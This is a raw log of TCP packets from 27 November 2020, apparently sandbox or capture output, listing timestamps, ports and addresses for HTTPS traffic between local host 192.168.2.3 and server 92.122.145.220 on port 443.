Nov 27, 2020 14:24:57.118666887 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.118696928 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.120332956 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.120359898 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.120425940 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.121786118 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.121810913 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.121865988 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.121912956 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.123398066 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.123418093 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.123485088 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.123516083 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.124094963 CET	49699	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.125039101 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.125082016 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.125144958 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.125197887 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.126620054 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.126640081 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.126704931 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.126732111 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.126929045 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.126946926 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.126965046 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.127010107 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.127019882 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.127048969 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.127070904 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.127415895 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.127433062 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.127449989 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.127465010 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.127487898 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.127511978 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.128263950 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.128304958 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.128349066 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.128387928 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.128397942 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.128438950 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.128470898 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.128475904 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.128494024 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.128524065 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.128524065 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.128581047 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.129365921 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.129390955 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.129405975 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.129419088 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.129477978 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.129518986 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.129820108 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.129838943 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.129884958 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.129918098 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.130296946 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.130315065 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.130331039 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.130346060 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.130371094 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.130402088 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.131289005 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.131306887 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.131321907 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.131342888 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.131370068 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.131406069 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.131422043 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.131453037 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.131486893 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.131517887 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.132239103 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.132256031 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.132271051 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.132287979 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.132312059 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.132358074 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.133069038 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.133111954 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.133155107 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.133181095 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.133219004 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.133258104 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.133272886 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.133306026 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.133306026 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.133351088 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.133356094 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.133408070 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.134175062 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.134191990 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.134203911 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.134215117 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.134269953 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.134314060 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.134654045 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.134674072 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.134728909 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.134754896 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.135128975 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.135145903 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.135162115 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.135178089 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.135198116 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.135225058 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.135246992 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.136110067 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.136126995 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.136137962 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.136149883 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.136197090 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.136228085 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.136250019 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.136296988 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.136348009 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.136374950 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.137073040 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.137094975 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.137109041 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.137130976 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.137151957 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.137181997 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.137900114 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.137923002 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.137995958 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.138031960 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.138040066 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.138053894 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.138070107 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.138088942 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.138098001 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.138118029 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.138149023 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.139007092 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.139028072 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.139041901 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.139059067 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.139089108 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.139115095 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.139513016 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.139533997 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.139588118 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.139627934 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.139976978 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.140002012 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.140022993 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.140041113 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.140049934 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.140096903 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.140130043 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.140929937 CET	443	49701	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.141005993 CET	49701	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.141123056 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.141190052 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.148781061 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.148825884 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.148864031 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.148924112 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.148969889 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.149121046 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.149163008 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.149189949 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.149199963 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.149219036 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.149250031 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.150001049 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.150044918 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.150085926 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.150094986 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.150114059 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.150139093 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.150789022 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.150829077 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.150862932 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.150875092 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.150891066 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.150924921 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.151623964 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.151665926 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.151695013 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.151705027 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.151725054 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.151757002 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.152077913 CET	443	49699	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.152440071 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.152488947 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.152517080 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.152529955 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.152544975 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.152585030 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.153285027 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.153325081 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.153364897 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.153369904 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.153399944 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.153428078 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.154097080 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.154145956 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.154167891 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.154189110 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.154196024 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.154232979 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.154942036 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.154982090 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.155009031 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.155035973 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.155050039 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.155087948 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.155811071 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.155854940 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.155881882 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.155894041 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.155909061 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.155944109 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.156594992 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.156637907 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.156662941 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.156677961 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.156692982 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.156724930 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.157433987 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.157474041 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.157502890 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.157524109 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.157532930 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.157593966 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.158258915 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.158303022 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.158344030 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.158345938 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.158366919 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.158395052 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.159089088 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.159131050 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.159166098 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.159169912 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.159189939 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.159219980 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.159934044 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.159975052 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.160012960 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.160022020 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.160028934 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.160075903 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.160748959 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.160792112 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.160820961 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.160830021 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.160842896 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.160876036 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.161571980 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.161618948 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.161645889 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.161658049 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.161672115 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.161706924 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.162395954 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.162436962 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.162463903 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.162476063 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.162497044 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.162519932 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.163065910 CET	443	49699	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.163105011 CET	443	49699	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.163151979 CET	443	49699	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.163172007 CET	49699	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.163189888 CET	49699	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.163193941 CET	443	49699	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.163203955 CET	49699	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.163233995 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.163253069 CET	49699	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.163275003 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.163280964 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.163315058 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.163328886 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.163363934 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.164046049 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.164087057 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.164123058 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.164124012 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.164141893 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.164176941 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.164874077 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.164916039 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.164947033 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.164954901 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.164974928 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.165004969 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.165710926 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.165752888 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.165783882 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.165791988 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.165810108 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.165834904 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.166527987 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.166569948 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.166604042 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.166606903 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.166631937 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.166659117 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.167356014 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.167412996 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.167453051 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.167488098 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.167506933 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.167510033 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.168199062 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.168243885 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.168282986 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.168298006 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.168323040 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.168349028 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.169019938 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.169065952 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.169106007 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.169116974 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.169434071 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.169842005 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.169881105 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.169905901 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.169928074 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.169948101 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.169986963 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.170669079 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.170711994 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.170742035 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.170772076 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.170794964 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.170835972 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.171509027 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.171582937 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.171616077 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.171638012 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.171652079 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.171711922 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:57.172338009 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.172416925 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:57.172419071 CET	49697	443	192.168.2.3	92.122.145.220
